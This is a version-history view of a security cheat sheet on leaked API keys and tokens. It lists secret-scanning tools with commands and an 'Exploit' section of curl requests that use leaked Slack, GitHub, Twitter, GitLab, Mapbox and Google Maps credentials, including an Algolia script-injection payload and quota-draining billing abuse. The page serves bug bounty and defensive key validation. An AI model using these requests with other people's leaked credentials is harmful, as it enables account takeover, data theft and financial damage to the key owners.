PayloadsAllTheThings/API Key Leaks/

158 lines
8.7 KiB
Raw Normal View History

2024-09-11 15:07:51 +00:00
# API Key and Token Leaks
2019-09-22 15:06:44 +00:00
> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
2019-09-22 15:06:44 +00:00
## Summary
- [Tools](#tools)
- [Exploit](#exploit)
- [Google Maps](#google-maps)
2019-09-22 15:06:44 +00:00
- [Algolia](#algolia)
- [Slack API Token](#slack-api-token)
- [Facebook Access Token](#facebook-access-token)
- [Github client id and client secret](#github-client-id-and-client-secret)
- [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
- [Twitter API Secret](#twitter-api-secret)
- [Twitter Bearer Token](#twitter-bearer-token)
2019-12-17 16:29:19 +00:00
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
2020-06-01 19:37:32 +00:00
- [HockeyApp API Token](#hockeyapp-api-token)
- [Mapbox API Token](#Mapbox-API-Token)
2020-01-02 22:33:04 +00:00
2019-09-22 15:06:44 +00:00
## Tools
2023-03-28 19:53:53 +00:00
- [momenbasel/KeyFinder]( - is a tool that let you find keys while surfing the web
- [streaak/keyhacks]( - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
- [trufflesecurity/truffleHog]( - Find credentials all over the place
2023-11-04 14:52:29 +00:00
## Scan a Github Organization
docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
## Scan a GitHub Repository, its Issues and Pull Requests
docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo --issue-comments --pr-comments
## Scan a Docker image for verified secrets
docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
2023-03-28 19:53:53 +00:00
- [aquasecurity/trivy]( - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
- [projectdiscovery/nuclei-templates]( - Use these templates to test an API token against many API service endpoints
nuclei -t token-spray/ -var token=token_list.txt
2023-04-12 11:12:33 +00:00
- [blacklanternsecurity/badsecrets]( - A library for detecting known or weak secrets on across many platforms
python examples/ --url
python examples/ eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
python ./badsecrets/examples/ --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
python ./badsecrets/examples/ --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
python ./badsecrets/examples/ --url https://localhost/
2023-05-08 15:08:25 +00:00
- [mazen160/secrets-patterns-db]( - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
2024-05-30 22:07:21 +00:00
- [d0ge/sign-saboteur]( - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens
2019-09-22 15:06:44 +00:00
## Exploit
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
2019-09-22 15:06:44 +00:00
### Google Maps
Use :
2023-11-04 14:52:29 +00:00
| Name | Endpoint |
| --------------------- | --------- |
| Static Maps | |
| Streetview |,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
| Embed | |
| Directions | |
| Geocoding |,30&key=KEY_HERE |
| Distance Matrix |,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE |
| Find Place from Text |,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE |
| Autocomplete | |
| Elevation |,-104.9847034&key=KEY_HERE |
| Timezone |,-119.6822510&timestamp=1331161200&key=KEY_HERE |
| Roads |,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY_HERE |
| Geolocate | |
2021-10-01 04:47:31 +00:00
2024-04-25 15:37:16 +00:00
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
2019-09-22 15:06:44 +00:00
### Algolia
curl --request PUT \
--url https://<application-id><example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
### Slack API Token
curl -sX POST ""
### Facebook Access Token
### Github client id and client secret
curl ''
### Twilio Account_sid and Auth token
### Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' ''
### Twitter Bearer Token
curl --request GET --url --header 'authorization: Bearer TOKEN'
### Gitlab Personal Access Token
curl "<your_access_token>"
2020-06-01 19:37:32 +00:00
### HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c"
### Mapbox API Token
2024-05-30 22:07:21 +00:00
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
2024-05-30 22:07:21 +00:00
* Check token validity: `curl ""`
* Get list of all tokens associated with an account (only works if the token is a Secret Token (sk), and has the appropriate scope): `curl ""`
2019-09-22 15:06:44 +00:00
## References
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](
2019-12-17 16:29:19 +00:00
* [Private API key leakage due to lack of access control - yox - August 8, 2018](
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](
* [Mapbox API Token Documentation](
2024-05-30 22:07:21 +00:00
* [Introducing SignSaboteur: forge signed web tokens with ease - Zakhar Fedotkin - 22 May 2024](